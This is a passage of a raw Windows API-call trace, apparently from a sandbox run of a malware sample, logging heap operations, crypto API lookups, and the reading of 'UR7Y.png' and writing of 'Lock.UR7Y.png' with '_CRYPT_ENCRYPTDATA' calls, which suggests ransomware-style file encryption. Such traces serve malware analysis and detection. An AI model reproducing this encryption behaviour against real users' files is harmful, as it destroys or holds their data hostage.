hHeap=0x970000) returned 1 [0239.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0239.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0239.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0239.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0239.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0239.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0239.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0239.582] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0239.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0239.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0239.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0239.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0239.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0239.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0239.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0239.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0239.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0239.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0239.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0239.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0239.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0239.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0239.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0239.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0239.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0239.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0239.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0239.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0239.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0239.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69be8 [0239.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69be8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0239.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0239.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0239.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0239.584] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0239.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0239.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0239.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0239.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0239.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0239.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0239.585] CryptDestroyHash (hHash=0xa87090) returned 1 [0239.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0239.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0239.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0239.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0239.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0239.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0239.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0239.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0239.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0239.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0239.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0239.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0239.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0239.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0239.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0239.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0239.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0239.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0239.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0239.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0239.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0239.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0239.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0239.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0239.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0239.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0239.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0239.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0239.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0239.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0239.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0239.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0239.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0239.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0239.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0239.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0239.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0239.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0239.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0239.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0239.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0239.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0239.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0239.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0239.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0239.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0239.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0239.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0239.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0239.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0239.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0239.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0239.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0239.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0239.590] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0239.590] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.590] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.590] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0239.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0239.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0239.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0239.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0239.592] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/UR7Y.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ur7y.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0239.592] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.592] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0239.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0239.592] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0239.593] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.593] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0239.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0239.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0239.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0239.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0239.593] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0239.593] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.UR7Y.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.ur7y.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0239.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0239.594] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0239.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0239.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0239.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0239.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0239.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0239.815] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0239.815] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0239.820] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x1111, lpOverlapped=0x0) returned 1 [0239.820] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0239.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0239.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0239.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0239.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0239.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11111) returned 0x2f14818 [0239.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5a020 | out: hHeap=0x970000) returned 1 [0239.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0239.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0239.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0239.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0239.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0239.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0239.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0239.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0239.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11111) returned 0x2f25938 [0239.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0239.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0239.828] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0239.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0239.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0239.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0239.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0239.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11111) returned 0x2f14818 [0239.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0239.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0239.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0239.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0239.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0239.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0239.831] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.832] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.832] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0239.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0239.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0239.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.834] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0239.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0239.834] HeapFree (in: 